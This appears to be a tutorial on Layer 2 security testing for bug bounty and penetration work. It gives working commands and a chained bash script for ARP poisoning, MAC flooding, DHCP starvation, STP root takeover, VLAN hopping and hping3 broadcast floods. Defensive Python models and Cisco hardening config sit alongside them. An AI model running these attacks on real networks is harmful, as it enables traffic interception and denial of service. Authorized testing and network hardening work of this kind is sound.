@aw-junaid
Created March 3, 2026 18:06
Comprehensive Guide to Layer 2 Security Testing: From Theory to Bug Bounty Practice

Introduction

Layer 2 (Data Link Layer) security is often overlooked in penetration testing, yet it forms the foundation of network infrastructure security. This comprehensive guide bridges the gap between theoretical knowledge and practical application, focusing on how to approach Layer 2 security testing in authorized environments.

Conducting a Layer 2 security test for a specific domain like domain.tech presents a unique challenge. Unlike a web application, layer 2 (the Data Link Layer) is confined to the local network segment. This means you cannot directly test the switches or internal network infrastructure of domain.tech from the internet.

However, if your bug bounty scope explicitly includes testing the local network (for example, if you are on-site, or if the company provides VPN access that places you inside their network), the checklist below becomes highly relevant. In such a scenario, you would be acting as an attacker already inside the perimeter.

Important Disclaimer: This article is for educational purposes only. The techniques described should only be used on networks you own or have explicit written permission to test. Unauthorized use is illegal and violates bug bounty terms of service.


Table of Contents

  1. Understanding Layer 2 Security
  2. The Complete Testing Checklist
  3. Kali Linux Tools Deep Dive
  4. Practical Testing Scenarios
  5. Mitigation Strategies
  6. Bug Bounty Approach for Remote Targets

Understanding Layer 2 Security

Before diving into testing, it's crucial to understand what Layer 2 encompasses and why it matters:

What is Layer 2?

  • OSI Model Layer: Data Link Layer
  • Key Protocols: Ethernet, ARP, MAC addressing, VLANs, STP, CDP/LLDP
  • Devices: Switches, bridges, network interface cards

Why Layer 2 Security Matters

  • Foundation of Network Trust: All higher-layer communications depend on Layer 2 integrity
  • Insider Threat Vector: Once an attacker gains internal access, Layer 2 becomes the primary attack surface
  • Bypass Potential: Layer 2 attacks can circumvent firewalls and IDS/IPS

The Complete Testing Checklist

Here is the Layer 2 security testing checklist, with an objective, risk level, impact and test steps for each item:

1. ARP Spoofing/Poisoning

Objective: Test if an attacker can intercept traffic between hosts
Risk Level: Critical
Impact: Man-in-the-Middle (MITM) attacks, credential theft, session hijacking

Test Steps:

  • Verify if Dynamic ARP Inspection (DAI) is enabled
  • Check ARP table behavior under attack
  • Test ARP cache poisoning persistence

2. MAC Flooding

Objective: Test switch MAC table overflow behavior
Risk Level: High
Impact: Switch fails open, allowing traffic sniffing across VLANs

Test Steps:

  • Determine switch MAC table size limitations
  • Monitor switch behavior under stress
  • Check for logging and alerts during attack

3. VLAN Hopping

Objective: Test VLAN isolation effectiveness
Risk Level: High
Impact: Unauthorized access to restricted network segments

Test Steps:

  • Check DTP (Dynamic Trunking Protocol) configuration
  • Verify native VLAN security
  • Test double-tagging vulnerabilities

4. CDP/LLDP Information Leakage

Objective: Assess information disclosure risks
Risk Level: Medium
Impact: Network reconnaissance, device fingerprinting

Test Steps:

  • Capture and analyze CDP/LLDP frames
  • Document all discovered information
  • Identify sensitive data exposure
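To make "capture and analyze" concrete, here is an added example (not part of the original gist) that decodes LLDP TLVs from a raw Ethernet frame and lists the fields a tester would document as disclosure. The frame, the switch name core-sw1, the port Gi1/0/12, the management address 10.0.0.2 and the version string are all constructed for the example; on a real engagement the frame would come from a pcap taken with tcpdump or from a tool such as above.

```python
"""Decode LLDP TLVs from a raw Ethernet frame and flag the fields that leak
topology or platform details. The frame below is constructed for the example."""
import struct
from ipaddress import IPv4Address

LLDP_MCAST = bytes.fromhex("0180c200000e")   # 01:80:c2:00:00:0e, nearest-bridge group address
ETH_P_LLDP = 0x88CC
TLV_NAMES = {4: "port_description", 5: "system_name", 6: "system_description"}


def fmt_mac(b):
    return ":".join(f"{x:02x}" for x in b)


def tlv(tlv_type, value):
    """LLDP TLV header: 7-bit type, 9-bit length, then the value."""
    return struct.pack("!H", (tlv_type << 9) | len(value)) + value


def build_sample_lldp_frame():
    """Constructed advertisement from a hypothetical switch 'core-sw1' (not a real capture)."""
    src = bytes.fromhex("001122334455")
    mgmt = (b"\x05\x01" + IPv4Address("10.0.0.2").packed   # addr len (1 + 4), subtype 1 = IPv4
            + b"\x02" + struct.pack("!I", 1) + b"\x00")     # ifIndex subtype, ifIndex 1, OID len 0
    tlvs = (tlv(1, b"\x04" + src)                           # Chassis ID, subtype 4 = MAC address
            + tlv(2, b"\x05" + b"Gi1/0/12")                 # Port ID, subtype 5 = interface name
            + tlv(3, struct.pack("!H", 120))                # TTL in seconds
            + tlv(4, b"uplink to floor-3 IDF")
            + tlv(5, b"core-sw1")
            + tlv(6, b"ExampleOS 15.2 (constructed version string)")
            + tlv(8, mgmt)
            + tlv(0, b""))                                  # End of LLDPDU
    return LLDP_MCAST + src + struct.pack("!H", ETH_P_LLDP) + tlvs


def parse_lldp(frame):
    """Return a dict of decoded TLVs; raises ValueError if the frame is not LLDP."""
    if struct.unpack("!H", frame[12:14])[0] != ETH_P_LLDP:
        raise ValueError("not an LLDP frame")
    info = {"neighbor_mac": fmt_mac(frame[6:12])}
    off = 14
    while off + 2 <= len(frame):
        hdr = struct.unpack("!H", frame[off:off + 2])[0]
        tlv_type, length = hdr >> 9, hdr & 0x1FF
        value = frame[off + 2:off + 2 + length]
        off += 2 + length
        if tlv_type == 0:
            break
        if tlv_type == 1:
            info["chassis_id"] = fmt_mac(value[1:]) if value[0] == 4 else value[1:].decode(errors="replace")
        elif tlv_type == 2:
            info["port_id"] = value[1:].decode(errors="replace")
        elif tlv_type == 3:
            info["ttl"] = struct.unpack("!H", value)[0]
        elif tlv_type == 8:
            addr_len, subtype = value[0], value[1]
            addr = value[2:1 + addr_len]
            info["management_address"] = str(IPv4Address(addr)) if subtype == 1 else addr.hex()
        elif tlv_type in TLV_NAMES:
            info[TLV_NAMES[tlv_type]] = value.decode(errors="replace")
    return info


def leaked_fields(info):
    """Fields a reviewer documents as disclosure: platform/version, management target, naming scheme."""
    return [k for k in ("system_description", "management_address", "system_name", "port_description")
            if k in info]


if __name__ == "__main__":
    decoded = parse_lldp(build_sample_lldp_frame())
    for key, val in decoded.items():
        print(f"{key:22} {val}")
    print("disclosure:", leaked_fields(decoded))
```

The system description and management address are the two fields that matter most in a report: one identifies the platform and software train, the other names the device's management interface. Both are legitimately needed by neighbours, so the fix is usually scoping (no lldp transmit on user-facing ports, as in the Cisco example further down) rather than disabling the protocol everywhere.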

5. STP Attacks

Objective: Test Spanning Tree Protocol security
Risk Level: Medium-High
Impact: Network topology manipulation, DoS conditions

Test Steps:

  • Test BPDU guard effectiveness
  • Attempt root bridge takeover
  • Verify STP convergence behavior

6. DHCP Starvation

Objective: Test DHCP pool exhaustion protection
Risk Level: Medium
Impact: Denial of service for new network devices

Test Steps:

  • Determine DHCP pool size
  • Test rate limiting effectiveness
  • Verify DHCP snooping configuration
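The two controls the last two steps check, per-port rate limiting and DHCP snooping's MAC verification, are easy to reason about with a model. The following is an added example, not code from the gist: it parses the BOOTP header of constructed DHCPDISCOVER messages, applies a rate limit and the "chaddr must equal the source MAC" rule, and reports what a switch would drop. Port names, MACs and the 10 pps limit are assumptions.

```python
"""DHCP snooping controls modelled in Python: per-port rate limiting and the
'verify mac-address' check (BOOTP chaddr must equal the frame's source MAC).
The DISCOVER records below are constructed for the example."""
import struct
from collections import defaultdict, deque

# op, htype, hlen, hops, xid, secs, flags, ciaddr, yiaddr, siaddr, giaddr, chaddr
BOOTP_FMT = "!BBBBIHH4s4s4s4s16s"


def mac_bytes(s):
    return bytes.fromhex(s.replace(":", ""))


def fmt_mac(b):
    return ":".join(f"{x:02x}" for x in b)


def build_discover(client_mac, xid):
    """Minimal BOOTP header of a DHCPDISCOVER (options omitted; not needed for these checks)."""
    zero = b"\x00" * 4
    return struct.pack(BOOTP_FMT, 1, 1, 6, 0, xid, 0, 0x8000, zero, zero, zero, zero,
                       mac_bytes(client_mac).ljust(16, b"\x00"))


def chaddr_of(bootp):
    fields = struct.unpack(BOOTP_FMT, bootp[:struct.calcsize(BOOTP_FMT)])
    hlen, chaddr = fields[2], fields[11]
    return fmt_mac(chaddr[:hlen])


class DhcpSnooping:
    """Untrusted-port checks applied to client DHCP messages."""

    def __init__(self, rate_limit_pps, verify_mac=True):
        self.rate_limit = rate_limit_pps
        self.verify_mac = verify_mac
        self.window = defaultdict(deque)   # port -> timestamps of packets in the last second
        self.errdisabled = set()
        self.dropped = []                  # (ts, port, reason)
        self.accepted = []                 # (ts, port, client mac)

    def ingress(self, ts, port, src_mac, bootp):
        if port in self.errdisabled:
            self.dropped.append((ts, port, "errdisabled"))
            return False
        q = self.window[port]
        q.append(ts)
        while ts - q[0] >= 1.0:
            q.popleft()
        if len(q) > self.rate_limit:        # 'ip dhcp snooping limit rate' err-disables the port
            self.errdisabled.add(port)
            self.dropped.append((ts, port, "rate_limit"))
            return False
        if self.verify_mac and chaddr_of(bootp) != src_mac.lower():
            self.dropped.append((ts, port, "chaddr_mismatch"))
            return False
        self.accepted.append((ts, port, chaddr_of(bootp)))
        return True


def starvation_demo(rate_limit_pps=10):
    """One port sends 20 DISCOVERs with rotating chaddr in 0.4 s; one legitimate client follows."""
    snoop = DhcpSnooping(rate_limit_pps)
    for i in range(20):
        bogus = build_discover(f"02:00:00:00:aa:{i:02x}", 0x2000 + i)
        snoop.ingress(0.02 * i, "Gi0/3", "02:00:00:00:00:99", bogus)
    snoop.ingress(5.0, "Gi0/1", "00:11:22:33:44:64", build_discover("00:11:22:33:44:64", 0x1001))
    reasons = defaultdict(int)
    for _, _, reason in snoop.dropped:
        reasons[reason] += 1
    return {"accepted": len(snoop.accepted), "errdisabled": sorted(snoop.errdisabled),
            "dropped": dict(reasons)}
```

The MAC check only catches a flooder that rotates chaddr while keeping its real source MAC; a tool that also spoofs the frame's source address passes it, which is why the rate limit (and port security's MAC limit) is the control that actually stops exhaustion. Checking both behaviours is what "verify DHCP snooping configuration" should mean in practice.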

7. MAC Address Spoofing

Objective: Test MAC-based security controls
Risk Level: High
Impact: Bypass MAC filtering, identity impersonation

Test Steps:

  • Test sticky MAC learning behavior
  • Verify MAC address change detection
  • Check for MAC limit violations

8. Broadcast Storms

Objective: Test storm control mechanisms
Risk Level: Medium
Impact: Network degradation, DoS conditions

Test Steps:

  • Generate controlled broadcast traffic
  • Monitor network performance impact
  • Test storm recovery behavior

9. Private VLAN Bypass

Objective: Test PVLAN isolation effectiveness
Risk Level: High
Impact: Bypass network segmentation

Test Steps:

  • Test inter-host communication in isolated VLANs
  • Verify proxy ARP vulnerabilities
  • Check promiscuous port configurations

Kali Linux Tools Deep Dive

Essential Tools Installation and Usage

1. arpspoof (from dsniff)

# Installation
sudo apt-get install dsniff

# Basic ARP spoofing: poison the victim and the gateway from two processes.
# Enable IP forwarding first so the intercepted hosts keep connectivity
# (a plain `echo 1 > /proc/...` fails under sudo because the redirect runs as your user).
sudo sysctl -w net.ipv4.ip_forward=1
sudo arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
sudo arpspoof -i eth0 -t 192.168.1.1 192.168.1.100

# -r poisons both hosts from a single process (same effect as the two commands above)
sudo arpspoof -i eth0 -t 192.168.1.100 -r 192.168.1.1

2. macof (MAC Flooding)

# Installation (part of dsniff)
sudo apt-get install dsniff

# Basic MAC flooding
macof -i eth0 -n 10000

# Targeted flooding with specific source/destination
macof -i eth0 -s 192.168.1.50 -d 192.168.1.1 -e 00:11:22:33:44:55

# Continuous flooding
while true; do macof -i eth0 -n 1000; sleep 1; done

3. yersinia (Multi-protocol Layer 2 Attack Tool)

# Installation
sudo apt-get install yersinia

# Interactive (ncurses) mode
sudo yersinia -I

# Command-line STP attacks; the numbers are those listed by `yersinia stp -h`
sudo yersinia stp -attack 0   # send a single configuration BPDU
sudo yersinia stp -attack 2   # configuration BPDU flood (DoS)
sudo yersinia stp -attack 4   # claim the root role (root bridge takeover)

# CDP attacks
sudo yersinia cdp -attack 1   # CDP table flood
sudo yersinia cdp -attack 2   # announce a virtual CDP device

4. dhcpig (DHCP Exhaustion)

# Installation
sudo apt-get install dhcpig

# Basic DHCP starvation against the server reachable from eth0
sudo dhcpig eth0

# Thread count, verbosity and timeouts are single-letter options whose meaning
# differs between releases; take them from `dhcpig --help` on the installed
# version rather than from memory.

5. voiphopper (VLAN Hopping)

# Installation
sudo apt-get install voiphopper

# CDP sniff mode: learn the voice VLAN ID from CDP and move the interface into it
sudo voiphopper -i eth0 -c 0

# CDP spoof mode: announce as an IP phone so the switch hands out the voice VLAN ID
sudo voiphopper -i eth0 -c 1

# LLDP-MED spoof mode
sudo voiphopper -i eth0 -l

# Hop directly into a known VLAN ID
sudo voiphopper -i eth0 -v 10

6. above (Protocol Sniffer)

# Installation (Above is a Python tool packaged in Kali; upstream: https://github.com/casterbyte/Above)
sudo apt-get install above

# Listen for CDP/LLDP/VTP/DTP/STP and other discovery protocols for 60 seconds
sudo above --interface eth0 --timer 60

# Save the frames seen to a pcap for later analysis in Wireshark
sudo above --interface eth0 --timer 60 --output capture.pcap

7. macchanger (MAC Spoofing)

# Installation
sudo apt-get install macchanger

# Random MAC address (the interface must be down while the address changes)
sudo ip link set dev eth0 down
sudo macchanger -r eth0
sudo ip link set dev eth0 up

# Specific MAC address (e.g. to test whether sticky MAC learning notices the change)
sudo ip link set dev eth0 down
sudo macchanger -m 00:11:22:33:44:55 eth0
sudo ip link set dev eth0 up

# Show the current and the permanent (burned-in) MAC
macchanger -s eth0

# Restore the permanent MAC when done
sudo macchanger -p eth0

8. hping3 (Broadcast Storm Generation)

# Installation
sudo apt-get install hping3

# UDP broadcast flood
hping3 --flood --rand-source --udp -p 80 192.168.1.255

# ICMP broadcast flood
hping3 --flood --rand-source --icmp 192.168.1.255

# TCP SYN broadcast flood
hping3 --flood --rand-source -S -p 80 192.168.1.255

Advanced Tool Combinations

Complete Layer 2 Attack Script

#!/bin/bash
# Comprehensive Layer 2 Security Testing Script
# FOR AUTHORIZED USE ONLY
# Run as root: arp-scan, macof, dhcpig and arpspoof need raw-socket access.

INTERFACE="eth0"
TARGET_NETWORK="192.168.1.0/24"
GATEWAY="192.168.1.1"
TARGET_HOST="192.168.1.100"   # single host used in the ARP spoofing phase
LOG_FILE="l2_test_$(date +%Y%m%d_%H%M%S).log"

log() { echo "$*" | tee -a "$LOG_FILE"; }

log "=== Layer 2 Security Testing Started ==="
log "Target: $TARGET_NETWORK"
log "Interface: $INTERFACE"
log "========================================"

# Phase 1: Reconnaissance
log "[Phase 1] Network Discovery"
arp-scan --localnet --interface "$INTERFACE" | tee -a "$LOG_FILE"
above --interface "$INTERFACE" --timer 30 | tee -a "$LOG_FILE"

# Phase 2: MAC Flooding Test
log "[Phase 2] Testing MAC Flooding"
timeout 30 macof -i "$INTERFACE" -n 5000 | tee -a "$LOG_FILE"

# Phase 3: DHCP Starvation Test
log "[Phase 3] Testing DHCP Exhaustion"
timeout 30 dhcpig "$INTERFACE" | tee -a "$LOG_FILE"

# Phase 4: ARP Spoofing Test (forwarding on, so the spoofed hosts keep connectivity)
log "[Phase 4] Testing ARP Spoofing"
sysctl -w net.ipv4.ip_forward=1
timeout 20 arpspoof -i "$INTERFACE" -t "$GATEWAY" "$TARGET_HOST" | tee -a "$LOG_FILE"

log "=== Testing Complete ==="

Practical Testing Scenarios

Scenario 1: Internal Network Assessment

Objective: Comprehensive Layer 2 security audit

Methodology:

  1. Reconnaissance Phase

    # Discover live hosts
    sudo nmap -sn 192.168.1.0/24
    
    # Capture CDP (dst 01:00:0c:cc:cc:cc) and LLDP (dst 01:80:c2:00:00:0e) frames;
    # without a filter the 100-frame limit fills with ordinary traffic
    sudo tcpdump -i eth0 -c 100 -w capture.pcap \
        'ether dst 01:00:0c:cc:cc:cc or ether dst 01:80:c2:00:00:0e'
    wireshark capture.pcap
  2. Vulnerability Scanning Phase

    # Check for STP vulnerabilities
    sudo yersinia -I
    
    # Test VLAN hopping (CDP sniff mode)
    sudo voiphopper -i eth0 -c 0
    
    # Attempt ARP poisoning
    sudo arpspoof -i eth0 -t 192.168.1.50 192.168.1.1

Scenario 2: VPN-Based Remote Testing

Objective: Test internal network through VPN access

Preparation:

# Configure VPN connection
sudo openvpn --config company.ovpn

# Verify you're on the internal network (the VPN interface should carry an internal address and routes)
ip addr show
ip route

# Start testing within scope. A TUN (Layer 3) VPN interface carries no Ethernet frames,
# so arp-scan and the other Layer 2 tools only work over a TAP/bridged VPN.
sudo arp-scan --localnet

Mitigation Strategies

Understanding defenses helps identify weak configurations:

1. ARP Spoofing Prevention

  • Dynamic ARP Inspection (DAI) on trusted switches
  • ARP spoofing detection tools (ArpON, Arpwatch)
  • Static ARP entries for critical devices
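The Arpwatch-style detection named in this list, and the "check ARP table behavior under attack" step of the checklist, can be expressed in a few dozen lines. The following is an added example, not code from the gist: it replays a constructed log of ARP replies and raises the three events a monitor should distinguish, a new station, an IP whose MAC changed, and one MAC answering for several IPs (the gateway plus a host is the classic interception pattern). All addresses in the sample are made up.

```python
"""Arpwatch-style monitor over ARP replies: reports new stations, IP-to-MAC changes,
flip-flops, and one MAC answering for several IPs (gateway plus hosts is the MITM pattern).
The reply log below is constructed for the example."""
from collections import defaultdict

# (time_s, sender_ip, sender_mac) taken from ARP *replies* (opcode 2) seen on the segment
SAMPLE_ARP_REPLIES = [
    (0.0, "192.168.1.1", "00:11:22:33:44:01"),      # gateway
    (0.5, "192.168.1.100", "00:11:22:33:44:64"),    # workstation
    (1.0, "192.168.1.1", "00:11:22:33:44:01"),
    (2.0, "192.168.1.1", "AA:BB:CC:DD:EE:FF"),      # gateway IP now answered by a different NIC
    (2.5, "192.168.1.100", "aa:bb:cc:dd:ee:ff"),    # the same NIC also answers for the workstation
    (3.0, "192.168.1.1", "00:11:22:33:44:01"),      # real gateway replies again: flip-flop
    (4.0, "192.168.1.1", "aa:bb:cc:dd:ee:ff"),
    (10.0, "192.168.1.7", "00:11:22:33:44:07"),     # new station, nothing suspicious
]


class ArpMonitor:
    def __init__(self):
        self.table = {}                          # ip -> mac currently believed
        self.change_count = defaultdict(int)     # ip -> number of MAC changes seen
        self.ips_by_mac = defaultdict(set)       # mac -> every ip it has answered for
        self.events = []                         # (ts, kind, subject, detail)

    def observe(self, ts, ip, mac):
        mac = mac.lower()
        prev = self.table.get(ip)
        if prev is None:
            self.events.append((ts, "new_station", ip, mac))
        elif prev != mac:
            self.change_count[ip] += 1
            # a single change also happens on lease reassignment or a NIC swap;
            # repeated changes mean two stations are fighting over the IP
            kind = "flip_flop" if self.change_count[ip] >= 2 else "changed_mac"
            self.events.append((ts, kind, ip, f"{prev} -> {mac}"))
        self.table[ip] = mac
        if self.ips_by_mac[mac] and ip not in self.ips_by_mac[mac]:
            self.events.append((ts, "multi_ip_claim", mac, sorted(self.ips_by_mac[mac] | {ip})))
        self.ips_by_mac[mac].add(ip)

    def suspect_macs(self):
        """MACs that answered for more than one IP: strong evidence, unlike a single change."""
        return sorted(m for m, ips in self.ips_by_mac.items() if len(ips) > 1)


def analyze(replies):
    mon = ArpMonitor()
    for ts, ip, mac in replies:
        mon.observe(ts, ip, mac)
    return mon


if __name__ == "__main__":
    mon = analyze(SAMPLE_ARP_REPLIES)
    for event in mon.events:
        print(event)
    print("suspect MACs:", mon.suspect_macs())
```

On a switch with DHCP snooping, DAI does the equivalent comparison against the snooping binding table and drops the mismatching reply rather than just logging it; a host-side monitor like this one is what remains for segments where DAI is not available.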

2. MAC Flooding Protection

  • Port security with MAC limiting
  • MAC address table size management
  • Storm control configuration
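Both the MAC flooding checklist item ("determine switch MAC table size limitations", "monitor switch behavior under stress") and the port-security mitigation here come down to one mechanism, so one model covers both. The following is an added example, not code from the gist or any vendor: a small switch with a bounded forwarding table, first without and then with a per-port MAC limit matching the `switchport port-security maximum 2` / `violation shutdown` lines in the Cisco example further down. Port names, table size and MACs are assumptions.

```python
"""Switch forwarding-table model: MAC learning, table overflow (unknown-unicast flooding)
and port security with a per-port MAC limit. The topology and frames are constructed."""
from collections import OrderedDict


class Switch:
    def __init__(self, ports, cam_capacity, port_security_max=None):
        self.ports = list(ports)
        self.cam_capacity = cam_capacity
        self.cam = OrderedDict()                  # mac -> port; oldest entry first
        self.ps_max = port_security_max           # None = port security off
        self.secured = {p: set() for p in ports}  # port -> source MACs allowed (sticky learning)
        self.errdisabled = set()

    def forward(self, in_port, src_mac, dst_mac):
        """Egress ports for one frame; None when the frame is discarded at ingress."""
        if in_port in self.errdisabled:
            return None
        if self.ps_max is not None and src_mac not in self.secured[in_port]:
            if len(self.secured[in_port]) >= self.ps_max:
                self.errdisabled.add(in_port)     # 'switchport port-security violation shutdown'
                return None
            self.secured[in_port].add(src_mac)
        # Learning. Real switches stop learning when the table is full and legitimate entries
        # age out; evicting the oldest entry here gives the same observable result.
        if src_mac not in self.cam and len(self.cam) >= self.cam_capacity:
            self.cam.popitem(last=False)
        self.cam[src_mac] = in_port
        self.cam.move_to_end(src_mac)
        out = self.cam.get(dst_mac)
        if out == in_port:
            return set()                          # destination is on the ingress port: filtered
        if out is None:                           # unknown unicast is flooded to every other port
            return {p for p in self.ports if p != in_port and p not in self.errdisabled}
        return {out}


def mac_flood_demo(port_security=False, cam_capacity=64, bogus_frames=200):
    """Hosts A (Gi0/1) and B (Gi0/2) are learned; Gi0/3 then sources many random MACs.
    Returns (egress ports of an A->B unicast afterwards, whether Gi0/3 was shut down)."""
    sw = Switch(["Gi0/1", "Gi0/2", "Gi0/3"], cam_capacity,
                port_security_max=2 if port_security else None)
    host_a, host_b, bcast = "00:00:00:00:00:01", "00:00:00:00:00:02", "ff:ff:ff:ff:ff:ff"
    sw.forward("Gi0/1", host_a, bcast)
    sw.forward("Gi0/2", host_b, bcast)
    for i in range(bogus_frames):
        sw.forward("Gi0/3", f"02:00:00:00:{i >> 8:02x}:{i & 0xff:02x}", bcast)
    return sw.forward("Gi0/1", host_a, host_b), "Gi0/3" in sw.errdisabled


if __name__ == "__main__":
    print("no port security :", mac_flood_demo(False))   # A->B reaches Gi0/3 as well
    print("port security max 2:", mac_flood_demo(True))  # A->B stays on Gi0/2, Gi0/3 shut down
```

The first run is what "switch fails open" means: once B's entry has been pushed out, A's unicast to B is flooded and the port that did the flooding receives it. The second run shows that the limit does not need to be tight; two MACs per access port is enough to stop the table from ever filling, which is why it is the standard recommendation alongside storm control.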

3. VLAN Hopping Prevention

  • Disable DTP on all access ports (switchport mode access; switchport nonegotiate on trunks)
  • Change the native VLAN from the default (VLAN 1) to an unused VLAN that no access port belongs to
  • Explicitly tag all VLANs on trunks, including the native VLAN (vlan dot1q tag native)
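The reason the last two points close the double-tagging case from the checklist ("test double-tagging vulnerabilities") is a property of how trunks treat the native VLAN, and it is easiest to see on actual frame bytes. The following is an added example, not code from the gist: it builds 802.1Q frames in memory, models an access port and a trunk between two switches, and returns the VLAN in which the far switch delivers a frame carrying two tags. Nothing is transmitted. The VLAN numbers (1, 20, 999) and the assumption that the access port accepts a tag naming its own VLAN are example choices.

```python
"""802.1Q frame handling on an access port and a trunk, showing why a trunk whose
native VLAN equals an access VLAN (and leaves native frames untagged) lets a
double-tagged frame cross VLANs, and why a dedicated native VLAN or 'vlan dot1q
tag native' closes it. Frames are built in memory; nothing is sent."""
import struct

ETH_P_8021Q = 0x8100
ETH_P_IP = 0x0800


def mac_bytes(s):
    return bytes.fromhex(s.replace(":", ""))


def build_frame(dst, src, vids, payload=b"\x45" + b"\x00" * 19):
    """Ethernet frame with zero or more 802.1Q tags (outermost first) and an IPv4 ethertype."""
    frame = mac_bytes(dst) + mac_bytes(src)
    for vid in vids:
        frame += struct.pack("!HH", ETH_P_8021Q, vid & 0x0FFF)
    return frame + struct.pack("!H", ETH_P_IP) + payload


def tags_of(frame):
    """List of VLAN IDs in the frame, outermost first."""
    vids, off = [], 12
    while struct.unpack("!H", frame[off:off + 2])[0] == ETH_P_8021Q:
        vids.append(struct.unpack("!H", frame[off + 2:off + 4])[0] & 0x0FFF)
        off += 4
    return vids


def pop_tag(frame):
    return frame[:12] + frame[16:]


def push_tag(frame, vid):
    return frame[:12] + struct.pack("!HH", ETH_P_8021Q, vid) + frame[12:]


def access_ingress(frame, access_vlan):
    """Access ports assign their VLAN; many switches accept a tag that names that same VLAN."""
    vids = tags_of(frame)
    if not vids:
        return access_vlan, frame
    if vids[0] == access_vlan:
        return access_vlan, pop_tag(frame)
    return None, None                           # tagged with a foreign VLAN: dropped


def trunk_egress(frame, vlan, native_vlan, tag_native):
    """Frames in the native VLAN leave untagged unless native tagging is enforced."""
    if vlan == native_vlan and not tag_native:
        return frame
    return push_tag(frame, vlan)


def trunk_ingress(frame, native_vlan):
    vids = tags_of(frame)
    return vids[0] if vids else native_vlan


def double_tag_outcome(native_vlan, tag_native=False, access_vlan=1, inner_vlan=20):
    """VLAN in which the far switch delivers a frame tagged [access_vlan, inner_vlan]."""
    crafted = build_frame("ff:ff:ff:ff:ff:ff", "02:00:00:00:00:01", [access_vlan, inner_vlan])
    vlan, frame = access_ingress(crafted, access_vlan)
    if vlan is None:
        return None
    on_wire = trunk_egress(frame, vlan, native_vlan, tag_native)
    return trunk_ingress(on_wire, native_vlan)


if __name__ == "__main__":
    print("native VLAN 1, untagged      ->", double_tag_outcome(1))        # delivered in VLAN 20
    print("native VLAN 999              ->", double_tag_outcome(999))      # stays in VLAN 1
    print("native VLAN 1, tagged native ->", double_tag_outcome(1, True))  # stays in VLAN 1
```

With the native VLAN equal to the access VLAN and left untagged, the first switch strips the outer tag at the access port and the trunk adds nothing back, so the inner tag is what the second switch reads. Either moving the native VLAN to one no access port uses or tagging the native VLAN puts a real outer tag on the wire and the frame stays where it started. A hardening review should confirm one of the two on every trunk, since the checklist's test passes only when the first switch strips the tag in exactly this way.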

4. STP Attack Prevention

  • BPDU Guard on all access ports
  • Root Guard on distribution switches
  • PortFast only on end-user ports
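The STP checklist item ("test BPDU guard effectiveness", "attempt root bridge takeover") and these three mitigations are all about how a bridge compares root IDs in received BPDUs. The following is an added example, not code from the gist: it builds and parses 802.1D configuration BPDUs, applies the root election rule (lowest priority, then lowest MAC), and shows what Root Guard and BPDU Guard decide for a given frame. All bridge priorities and MACs are constructed.

```python
"""Configuration BPDU build/parse plus the root election rule, showing what
Root Guard compares on a port and what BPDU Guard reacts to. Frames are constructed."""
import struct

STP_MCAST = bytes.fromhex("0180c2000000")   # 01:80:c2:00:00:00
LLC_STP = b"\x42\x42\x03"                   # DSAP/SSAP 0x42, UI control field


def mac_bytes(s):
    return bytes.fromhex(s.replace(":", ""))


def fmt_mac(b):
    return ":".join(f"{x:02x}" for x in b)


def build_config_bpdu(src_mac, root_prio, root_mac, path_cost, bridge_prio, bridge_mac, port_id=0x8001):
    """802.1D configuration BPDU; timers are in 1/256 s units (max age 20 s, hello 2 s, fwd delay 15 s)."""
    body = struct.pack("!HBBB", 0, 0, 0, 0)                           # protocol id, version, type, flags
    body += struct.pack("!H6s", root_prio, mac_bytes(root_mac))       # root bridge ID
    body += struct.pack("!I", path_cost)
    body += struct.pack("!H6s", bridge_prio, mac_bytes(bridge_mac))   # sending bridge ID
    body += struct.pack("!HHHHH", port_id, 0, 20 * 256, 2 * 256, 15 * 256)
    payload = LLC_STP + body
    return STP_MCAST + mac_bytes(src_mac) + struct.pack("!H", len(payload)) + payload


def parse_bpdu(frame):
    length = struct.unpack("!H", frame[12:14])[0]
    payload = frame[14:14 + length]
    if frame[:6] != STP_MCAST or payload[:3] != LLC_STP:
        raise ValueError("not an STP BPDU")
    b = payload[3:]
    _, _, bpdu_type, flags = struct.unpack("!HBBB", b[:5])
    root_prio, root_mac = struct.unpack("!H6s", b[5:13])
    cost = struct.unpack("!I", b[13:17])[0]
    br_prio, br_mac = struct.unpack("!H6s", b[17:25])
    port_id, _, max_age, hello, fwd = struct.unpack("!HHHHH", b[25:35])
    return {"type": bpdu_type, "flags": flags, "root": (root_prio, fmt_mac(root_mac)), "cost": cost,
            "bridge": (br_prio, fmt_mac(br_mac)), "port_id": port_id,
            "max_age_s": max_age / 256, "hello_s": hello / 256, "fwd_delay_s": fwd / 256}


def elect_root(frames):
    """Lowest (priority, MAC) root ID advertised wins: a priority-0 claim beats any default."""
    return min(parse_bpdu(f)["root"] for f in frames)


def root_guard_blocks(bpdu, current_root):
    """Root Guard: a BPDU advertising a root superior to the current one puts the port
    into root-inconsistent (blocking) state instead of re-electing the root."""
    return bpdu["root"] < current_root


def bpdu_guard_trips(frame):
    """BPDU Guard: any BPDU at all on a PortFast/edge port err-disables the port."""
    try:
        parse_bpdu(frame)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    legit = build_config_bpdu("00:11:22:33:44:01", 4096, "00:11:22:33:44:01", 0, 4096, "00:11:22:33:44:01")
    rogue = build_config_bpdu("02:00:00:00:00:01", 0, "02:00:00:00:00:01", 0, 0, "02:00:00:00:00:01")
    print("elected root without guards:", elect_root([legit, rogue]))
    print("root guard blocks rogue BPDU:", root_guard_blocks(parse_bpdu(rogue), (4096, "00:11:22:33:44:01")))
```

The election rule is why a priority-0 BPDU on any unguarded port wins outright: there is no authentication, only the comparison. Root Guard keeps the comparison but refuses to act on a superior claim from a port that should never lead to the root (distribution-facing ports), while BPDU Guard does not compare at all and simply shuts an edge port that receives any BPDU; the PortFast-only-on-end-user-ports rule exists because BPDU Guard is normally tied to PortFast.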

Configuration Examples

Cisco Switch Hardening

! Global settings
no cdp run
spanning-tree portfast default
spanning-tree portfast bpduguard default

! Interface configuration
interface GigabitEthernet0/1
 switchport mode access
 switchport port-security
 switchport port-security maximum 2
 switchport port-security violation shutdown
 switchport port-security mac-address sticky
 spanning-tree portfast
 spanning-tree bpduguard enable
 storm-control broadcast level 50
 storm-control multicast level 30
 no cdp enable
 no lldp transmit
 no lldp receive

Bug Bounty Approach for Remote Targets

Since direct Layer 2 testing isn't possible remotely, here's how to adapt:

Phase 1: Scope Analysis

# Examine target domain
whois domain.tech
nslookup domain.tech
dig domain.tech ANY

# Check for VPN or internal access programs
# Review program scope document carefully

Phase 2: External Reconnaissance

# Gather infrastructure information
theHarvester -d domain.tech -b all
amass enum -d domain.tech

